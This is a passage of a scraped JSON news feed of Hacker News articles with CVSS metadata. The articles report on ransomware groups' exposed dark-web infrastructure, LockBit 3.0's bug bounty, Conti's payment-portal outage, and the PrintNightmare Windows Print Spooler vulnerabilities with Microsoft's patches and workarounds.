Web](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjaV9wVlzzeADW3plTap4jOh9fqaG1M5Q8q7q-pX6vbN6EAWqHqnEEvq-nA0yW2N64kchUyacQRbSQXnYk0i2qcd2Lxjiu4alpeum5cu6QCPMBvjt90TSKl-7opy4d0YCn8MX_tPYh7B04Vidh2gZfgYJXxKGevp9NbNa8lZg-DQGZXl7xjDrvwfK89/s728-e1000/cert.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjaV9wVlzzeADW3plTap4jOh9fqaG1M5Q8q7q-pX6vbN6EAWqHqnEEvq-nA0yW2N64kchUyacQRbSQXnYk0i2qcd2Lxjiu4alpeum5cu6QCPMBvjt90TSKl-7opy4d0YCn8MX_tPYh7B04Vidh2gZfgYJXxKGevp9NbNa8lZg-DQGZXl7xjDrvwfK89/s728-e100/cert.jpg>)\n\nBesides TLS certificate matching, a second method employed to uncover the adversaries' clear web infrastructures entailed checking the favicons associated with the darknet websites against the public internet using web crawlers like Shodan.\n\nIn the case of [Nokoyawa](<https://www.fortinet.com/blog/threat-research/nokoyawa-variant-catching-up>), a new Windows ransomware strain that appeared earlier this year and shares substantial code similarities with Karma, the site hosted on the TOR hidden service was found to harbor a directory traversal flaw that enabled the researchers to access the \"[/var/log/auth.log](<https://help.ubuntu.com/community/LinuxLogFiles>)\" file used to capture user logins.\n\nThe findings demonstrate that not only are the criminal actors' leak sites accessible for any user on the internet, other infrastructure components, including identifying server data, were left exposed, effectively making it possible to obtain the login locations used to administer the ransomware servers.\n\n[![Anonymized Ransomware Sites on Dark Web](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiKBfxqmczj3qrieqIFbqxh8pEIBTtSz9_BdFyfDEKmGEjCUPpH7QhuZsHt6jxBWgKWU2wcnFlthPIVmExegrtxg0bzvUln74smXx6Krggvf6_bQ9tr_o1NRTxCcjmsINrMdRyZpvXHdS8zZSeFCw8zi_qx2puc2SGz4zIL9dtTRKkdNSYZMGX3KE3p/s728-e1000/keys.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiKBfxqmczj3qrieqIFbqxh8pEIBTtSz9_BdFyfDEKmGEjCUPpH7QhuZsHt6jxBWgKWU2wcnFlthPIVmExegrtxg0bzvUln74smXx6Krggvf6_bQ9tr_o1NRTxCcjmsINrMdRyZpvXHdS8zZSeFCw8zi_qx2puc2SGz4zIL9dtTRKkdNSYZMGX3KE3p/s728-e100/keys.jpg>)\n\nFurther analysis of the successful root user logins showed that they originated from two IP addresses 5.230.29[.]12 and 176.119.0[.]195, the former of which belongs to GHOSTnet GmbH, a hosting provider that offers Virtual Private Server (VPS) services.\n\n\"176.119.0[.]195 however belongs to AS58271 which is listed under the name Tyatkova Oksana Valerievna,\" Eubanks noted. \"It's possible the operator forgot to use the German-based VPS for obfuscation and logged into a session with this web server directly from their true location at 176.119.0[.]195.\"\n\n### LockBit adds a bug bounty program to its revamped RaaS operation\n\nThe development comes as the operators of the emerging [Black Basta](<https://thehackernews.com/2022/06/cybersecurity-experts-warn-of-emerging.html>) ransomware [expanded](<https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html>) their attack arsenal by using QakBot for initial access and lateral movement, and taking advantage of the PrintNightmare vulnerability ([CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>)) to conduct privileged file operations.\n\nWhat's more, the LockBit ransomware gang last week [announced](<https://twitter.com/vxunderground/status/1541156954214727685>) the release of LockBit 3.0 with the message \"Make Ransomware Great Again!,\" in addition to launching their own Bug Bounty program, offering rewards ranging between $1,000 and $1 million for identifying security flaws and \"brilliant ideas\" to improve its software.\n\n[![bug bounty program](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwyY9trUR2Z6AyEmJ7Zm0vLXiYawK0UpJysKcAGEK4eyTyY-cibr3Vgf7ATbqzCSSUqeTQTR_TQkAtJ5XPpqiw8JZnWQg1KTo0ktefqdmaqc8XFgVp27DzMej76ut1FMMJ8h0r2U-UR72FNxbM4_q9ph1cAzMroG_05T9as1lDjAVK34y53Er0koFQ/s728-e1000/bug.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwyY9trUR2Z6AyEmJ7Zm0vLXiYawK0UpJysKcAGEK4eyTyY-cibr3Vgf7ATbqzCSSUqeTQTR_TQkAtJ5XPpqiw8JZnWQg1KTo0ktefqdmaqc8XFgVp27DzMej76ut1FMMJ8h0r2U-UR72FNxbM4_q9ph1cAzMroG_05T9as1lDjAVK34y53Er0koFQ/s728-e100/bug.jpg>)\n\n\"The release of LockBit 3.0 with the introduction of a bug bounty program is a formal invitation to cybercriminals to help assist the group in its quest to remain at the top,\" Satnam Narang, senior staff research engineer at Tenable, said in a statement shared with The Hacker News.\n\n\"A key focus of the bug bounty program are defensive measures: Preventing security researchers and law enforcement from finding bugs in its leak sites or ransomware, identifying ways that members including the affiliate program boss could be doxed, as well as finding bugs within the messaging software used by the group for internal communications and the Tor network itself.\"\n\n\"The threat of being doxed or identified signals that law enforcement efforts are clearly a great concern for groups like LockBit. Finally, the group is planning to offer Zcash as a payment option, which is significant, as Zcash is harder to trace than Bitcoin, making it harder for researchers to keep tabs on the group's activity.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-05T07:06:00", "type": "thn", "title": "Researchers Share Techniques to Uncover Anonymized Ransomware Sites on Dark Web", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-07-06T06:06:49", "id": "THN:849B821D3503018DA38FAFFBC34DAEBB", "href": "https://thehackernews.com/2022/07/researchers-share-techniques-to-uncover.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:22", "description": "[![Windows PrintNightmare Vulnerability](https://thehackernews.com/images/-wbLrBJlJCfE/YOUa-690-KI/AAAAAAAADG0/6tT84mGPz6gQ_5vYBxhkEE_spk0LW4WpwCLcBGAsYHQ/s728-e1000/windows-patch-update.jpg)](<https://thehackernews.com/images/-wbLrBJlJCfE/YOUa-690-KI/AAAAAAAADG0/6tT84mGPz6gQ_5vYBxhkEE_spk0LW4WpwCLcBGAsYHQ/s0/windows-patch-update.jpg>)\n\nMicrosoft has shipped an [emergency out-of-band security update](<https://docs.microsoft.com/en-us/windows/release-health/windows-message-center#1646>) to address a critical zero-day vulnerability \u2014 known as \"PrintNightmare\" \u2014 that affects the Windows Print Spooler service and can permit remote threat actors to run arbitrary code and take over vulnerable systems.\n\nTracked as [CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>) (CVSS score: 8.8), the remote code execution flaw impacts all supported editions of Windows. Last week, the company warned it had detected active exploitation attempts targeting the vulnerability.\n\n\"The Microsoft Windows Print Spooler service fails to restrict access to functionality that allows users to add printers and related drivers, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system,\" the CERT Coordination Center said of the issue.\n\nIt's worth noting that PrintNightmare includes both remote code execution and a [local privilege escalation](<https://github.com/calebstewart/CVE-2021-1675>) vector that can be abused in attacks to run commands with SYSTEM privileges on targeted Windows machines.\n\n[![](https://thehackernews.com/images/-NzUbsCmtpLU/YOUekekqtnI/AAAAAAAADG8/HwnD7Xq3_iYftG9BrRvS1tJxIBOomRzXgCLcBGAsYHQ/s0/lpe.jpg)](<https://thehackernews.com/images/-NzUbsCmtpLU/YOUekekqtnI/AAAAAAAADG8/HwnD7Xq3_iYftG9BrRvS1tJxIBOomRzXgCLcBGAsYHQ/s0/lpe.jpg>)\n\n\"The Microsoft update for CVE-2021-34527 only appears to address the Remote Code Execution (RCE via SMB and RPC) variants of the PrintNightmare, and not the Local Privilege Escalation (LPE) variant,\" CERT/CC vulnerability analyst Will Dormann [said](<https://www.kb.cert.org/vuls/id/383432>).\n\nThis effectively means that the incomplete fix could still be used by a local adversary to gain SYSTEM privileges. As workarounds, Microsoft recommends stopping and disabling the Print Spooler service or turning off inbound remote printing through Group Policy to block remote attacks.\n\nGiven the criticality of the flaw, the Windows maker has issued patches for:\n\n * Windows Server 2019\n * Windows Server 2012 R2\n * Windows Server 2008\n * Windows 8.1\n * Windows RT 8.1, and\n * Windows 10 (versions 21H1, 20H2, 2004, 1909, 1809, 1803, and 1507)\n\nMicrosoft has even taken the unusual step of issuing the fix for Windows 7, which officially reached the end of support as of January 2020.\n\nThe [update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), however, does not include Windows 10 version 1607, Windows Server 2012, or Windows Server 2016, for which the Redmond-based company stated patches will be released in the forthcoming days.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-07T03:11:00", "type": "thn", "title": "Microsoft Issues Emergency Patch for Critical Windows PrintNightmare Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-07T03:38:13", "id": "THN:42B8A8C00254E7187FE0F1EF2AF6F5D7", "href": "https://thehackernews.com/2021/07/microsoft-issues-emergency-patch-for.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:22", "description": "[![](https://thehackernews.com/images/-4tveTym6-fk/YOZ_5ZwEbHI/AAAAAAAADHs/xXSCpfsipXYpe6tJM2SGaTIDUE9dVGoGwCLcBGAsYHQ/s0/PrintNightmare-Vulnerability-Patch.jpg)](<https://thehackernews.com/images/-4tveTym6-fk/YOZ_5ZwEbHI/AAAAAAAADHs/xXSCpfsipXYpe6tJM2SGaTIDUE9dVGoGwCLcBGAsYHQ/s0/PrintNightmare-Vulnerability-Patch.jpg>)\n\nEven as Microsoft [expanded patches](<https://docs.microsoft.com/en-us/windows/release-health/windows-message-center>) for the so-called [PrintNightmare vulnerability](<https://thehackernews.com/2021/07/how-to-mitigate-microsoft-print-spooler.html>) for Windows 10 version 1607, Windows Server 2012, and Windows Server 2016, it has come to light that the fix for the remote code execution exploit in the Windows Print Spooler service can be bypassed in certain scenarios, effectively defeating the security protections and permitting attackers to run arbitrary code on infected systems.\n\nOn Tuesday, the Windows maker issued an [emergency out-of-band update](<https://thehackernews.com/2021/07/microsoft-issues-emergency-patch-for.html>) to address [CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>) (CVSS score: 8.8) after the flaw was accidentally disclosed by researchers from Hong Kong-based cybersecurity firm Sangfor late last month, at which point it emerged that the issue was different from another bug \u2014 tracked as [CVE-2021-1675](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>) \u2014 that was patched by Microsoft on June 8.\n\n\"Several days ago, two security vulnerabilities were found in Microsoft Windows' existing printing mechanism,\" Yaniv Balmas, head of cyber research at Check Point, told The Hacker News. \"These vulnerabilities enable a malicious attacker to gain full control on all windows environments that enable printing.\"\n\n\"These are mostly working stations but, at times, this relates to entire servers that are an integral part of very popular organizational networks. Microsoft classified these vulnerabilities as critical, but when they were published they were able to fix only one of them, leaving the door open for explorations of the second vulnerability,\" Balmas added.\n\nPrintNightmare stems from bugs in the Windows [Print Spooler](<https://docs.microsoft.com/en-us/windows/win32/printdocs/print-spooler>) service, which manages the printing process inside local networks. The main concern with the threat is that non-administrator users had the ability to load their own printer drivers. This has now been rectified.\n\n\"After installing this [update] and later Windows updates, users who are not administrators can only install signed print drivers to a print server,\" Microsoft [said](<https://support.microsoft.com/en-us/topic/july-7-2021-kb5004948-os-build-14393-4470-out-of-band-fb676642-a3fe-4304-a79c-9d651d2f6550>), detailing the improvements made to mitigate the risks associated with the flaw. \"Administrator credentials will be required to install unsigned printer drivers on a printer server going forward.\"\n\nPost the update's release, CERT/CC vulnerability analyst Will Dormann cautioned that the patch \"only appears to address the Remote Code Execution (RCE via SMB and RPC) variants of the PrintNightmare, and not the Local Privilege Escalation (LPE) variant,\" thereby allowing attackers to abuse the latter to gain SYSTEM privileges on vulnerable systems.\n\nNow, further testing of the update has revealed that exploits targeting the flaw could [bypass](<https://twitter.com/gentilkiwi/status/1412771368534528001>) the [remediations](<https://twitter.com/wdormann/status/1412813044279910416>) entirely to gain both local privilege escalation and remote code execution. To achieve this, however, a [Windows policy](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/printing/use-group-policy-to-control-ad-printer>) called '[Point and Print Restrictions](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/group-policy/point-print-restrictions-policies-ignored>)' must be enabled (Computer Configuration\\Policies\\Administrative Templates\\Printers: Point and Print Restrictions), using which malicious printer drivers could be potentially installed.\n\n\"Note that the Microsoft update for CVE-2021-34527 does not effectively prevent exploitation of systems where the Point and Print NoWarningNoElevationOnInstall is set to 1,\" Dormann [said](<https://www.kb.cert.org/vuls/id/383432>) Wednesday. Microsoft, for its part, [explains in its advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) that \"Point and Print is not directly related to this vulnerability, but the technology weakens the local security posture in such a way that exploitation will be possible.\"\n\nWhile Microsoft has recommended the nuclear option of stopping and disabling the Print Spooler service, an [alternative workaround](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) is to enable security prompts for Point and Print, and limit printer driver installation privileges to administrators alone by configuring the \"RestrictDriverInstallationToAdministrators\" registry value to prevent regular users from installing printer drivers on a print server.\n\n**UPDATE:** In response to CERT/CC's report, Microsoft [said](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) on Thursday:\n\n\"Our investigation has shown that the OOB [out-of-band] security update is working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare. All reports we have investigated have relied on the changing of default registry setting related to Point and Print to an insecure configuration.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-08T04:35:00", "type": "thn", "title": "Microsoft's Emergency Patch Fails to Fully Fix PrintNightmare RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-09T09:52:49", "id": "THN:CAFA6C5C5A34365636215CFD7679FD50", "href": "https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:23", "description": "[![windows print spooler vulnerability](https://thehackernews.com/images/-RJ_0BYkTxHY/YN7HyUD-_KI/AAAAAAAA4SA/dbXcZli9DPwTnJvla5sgZ3hDzIqO8zLRgCLcBGAsYHQ/s728-e1000/windows-print-spooler-vulnerability.jpg)](<https://thehackernews.com/images/-RJ_0BYkTxHY/YN7HyUD-_KI/AAAAAAAA4SA/dbXcZli9DPwTnJvla5sgZ3hDzIqO8zLRgCLcBGAsYHQ/s0/windows-print-spooler-vulnerability.jpg>)\n\nMicrosoft on Thursday officially confirmed that the \"**PrintNightmare**\" remote code execution (RCE) vulnerability affecting Windows Print Spooler is different from the issue the company addressed as part of its Patch Tuesday update released earlier this month, while warning that it has detected exploitation attempts targeting the flaw.\n\nThe company is tracking the security weakness under the identifier [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), and has assigned it a severity rating of 8.8 on the CVSS scoring system. All versions of Windows contain the vulnerable code and are susceptible to exploitation.\n\n\"A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\" Microsoft said in its advisory. \"An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\"\n\n\"An attack must involve an authenticated user calling RpcAddPrinterDriverEx(),\" the Redmond-based firm added. When reached by The Hacker News, the company said it had nothing to share beyond the advisory.\n\nThe acknowledgment comes after researchers from Hong Kong-based cybersecurity company Sangfor [published](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>) a technical deep-dive of a Print Spooler RCE flaw to GitHub, along with a fully working PoC code, before it was taken down just hours after it went up.\n\n[![](https://thehackernews.com/images/-Zl5E2TyZRFQ/YN7Ej6s8x8I/AAAAAAAA4R4/FEYZ4JpYdakscU9e8eXMl9VEI0Hl1P_SwCLcBGAsYHQ/s0/ms.jpg)](<https://thehackernews.com/images/-Zl5E2TyZRFQ/YN7Ej6s8x8I/AAAAAAAA4R4/FEYZ4JpYdakscU9e8eXMl9VEI0Hl1P_SwCLcBGAsYHQ/s0/ms.jpg>)\n\nThe disclosures also set off speculation and debate about whether the June patch does or does not protect against the RCE vulnerability, with the CERT Coordination Center [noting](<https://kb.cert.org/vuls/id/383432>) that \"while Microsoft has released an update for CVE-2021-1675, it is important to realize that this update does NOT protect Active Directory domain controllers, or systems that have Point and Print configured with the NoWarningNoElevationOnInstall option configured.\"\n\nCVE-2021-1675, originally classified as an elevation of privilege vulnerability and later revised to RCE, was remediated by Microsoft on June 8, 2021.\n\nThe company, in its advisory, noted that PrintNightmare is distinct from CVE-2021-1675 for reasons that the latter resolves a separate vulnerability in RpcAddPrinterDriverEx() and that the attack vector is different.\n\nAs workarounds, Microsoft is recommending users to disable the Print Spooler service or turn off inbound remote printing through Group Policy. To reduce the attack surface and as an alternative to completely disabling printing, the company is also advising to check membership and nested group membership, and reduce membership as much as possible, or completely empty the groups where possible.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-02T05:36:00", "type": "thn", "title": "Microsoft Warns of Critical \"PrintNightmare\" Flaw Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-03T07:11:54", "id": "THN:9CE630030E0F3E3041E633E498244C8D", "href": "https://thehackernews.com/2021/07/microsoft-warns-of-critical.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:20", "description": "[![](https://thehackernews.com/images/-dWO_rqbdIfE/YPENEeXU5vI/AAAAAAAADNg/aAsoS9_8txQ842LEOAjpzJcvpkm6tro9wCLcBGAsYHQ/s0/Windows-Print-Spooler-Vulnerability.jpg)](<https://thehackernews.com/images/-dWO_rqbdIfE/YPENEeXU5vI/AAAAAAAADNg/aAsoS9_8txQ842LEOAjpzJcvpkm6tro9wCLcBGAsYHQ/s0/Windows-Print-Spooler-Vulnerability.jpg>)\n\nMicrosoft on Thursday shared fresh guidance on yet another vulnerability affecting the Windows Print Spooler service, stating that it's working to address it in an upcoming security update.\n\nTracked as [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) (CVSS score: 7.8), the issue concerns a local privilege escalation flaw that could be abused to perform unauthorized actions on the system. The company credited security researcher Jacob Baines for discovering and reporting the bug.\n\n\"An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges,\" the Windows maker said in its advisory. \"An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\"\n\nHowever, it's worth pointing out that successful exploitation of the vulnerability requires the attacker to have the ability to execute code on a victim system. In other words, this vulnerability can only be exploited locally to gain elevated privileges on a device.\n\n[![](https://thehackernews.com/images/-KUjZieTgFsk/YPENj7mkDHI/AAAAAAAADNo/7YO-HAzw4LQN5_eg5egoI8gP2YeP34pjwCLcBGAsYHQ/s0/hacking.jpg)](<https://thehackernews.com/images/-KUjZieTgFsk/YPENj7mkDHI/AAAAAAAADNo/7YO-HAzw4LQN5_eg5egoI8gP2YeP34pjwCLcBGAsYHQ/s0/hacking.jpg>)\n\nAs workarounds, Microsoft is recommending users to stop and disable the Print Spooler service to prevent malicious actors from exploiting the vulnerability.\n\nThe development comes days after the Redmond-based firm rolled out patches to address a critical shortcoming in the same component that it disclosed as being actively exploited to stage in-the-wild attacks, making it the third printer-related flaw to come to light in recent weeks.\n\nDubbed PrintNightmare ([CVE-2021-34527](<https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html>)), the vulnerability stems from a missing permission check in the Print Spooler that enables the installation of malicious print drivers to achieve remote code execution or local privilege escalation on vulnerable systems.\n\nHowever, it later emerged that the out-of-band security update could be entirely bypassed under specific conditions to gain both local privilege escalation and remote code execution. Microsoft has since said the fixes are \"working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-16T04:40:00", "type": "thn", "title": "Microsoft Warns of New Unpatched Windows Print Spooler Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-34527"], "modified": "2021-07-17T11:53:08", "id": "THN:CF5E93184467C7B8F56A517CE724ABCF", "href": "https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:05", "description": "[![Conti Ransomware Group](https://thehackernews.com/new-images/img/a/AVvXsEguJG5dD1Vh67fJlg0O-HXucpsF2Y-eVW6kua8F3Er_7OwG5WZpZAqvZHKbXJboPvuTyfrTXpc260OZ87-4ehJm-_qY8JOnLJxhWok-es74ZTW3O7ua3WuueglfYtH7632jDmh5DfPftDD998FED2xruJFMtTPwe_eI7umOKXrdazu4WRTC-OnHg7ND=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEguJG5dD1Vh67fJlg0O-HXucpsF2Y-eVW6kua8F3Er_7OwG5WZpZAqvZHKbXJboPvuTyfrTXpc260OZ87-4ehJm-_qY8JOnLJxhWok-es74ZTW3O7ua3WuueglfYtH7632jDmh5DfPftDD998FED2xruJFMtTPwe_eI7umOKXrdazu4WRTC-OnHg7ND>)\n\nThe clearnet and dark web payment portals operated by the [Conti](<https://thehackernews.com/2021/05/fbi-warns-conti-ransomware-hit-16-us.html>) ransomware group have gone down in what appears to be an attempt to shift to new infrastructure after details about the gang's inner workings and its members were made public.\n\nAccording to [MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1461450607311605766>), \"while both the clearweb and Tor domains of the leak site of the Conti ransomware gang is online and working, both their clearweb and Tor domains for the payment site (which is obviously more important than the leak) is down.\"\n\nIt's not clear what prompted the shutdown, but the development comes as Swiss cybersecurity firm PRODAFT [offered](<https://www.prodaft.com/resource/detail/conti-ransomware-group-depth-analysis>) an unprecedented look into the group's ransomware-as-a-service (RaaS) model, wherein the developers sell or lease their ransomware technology to affiliates hired from darknet forums, who then carry out attacks on their behalf while also netting about 70% of each ransom payment extorted from the victims.\n\nThe result? Three members of the Conti team have been identified so far, each playing the roles of admin (\"Tokyo\"), assistant (\"it_work_support@xmpp[.]jp\"), and recruiter (\"IT_Work\") to attract new affiliates into their network.\n\nWhile ransomware attacks work by encrypting the victims' sensitive information and rendering it inaccessible, threat actors have increasingly latched on to a two-pronged strategy called double extortion to demand a ransom payment for decrypting the data and threaten to publicly publish the stolen information if the payment is not received within a specific deadline.\n\n[![Conti Ransomware 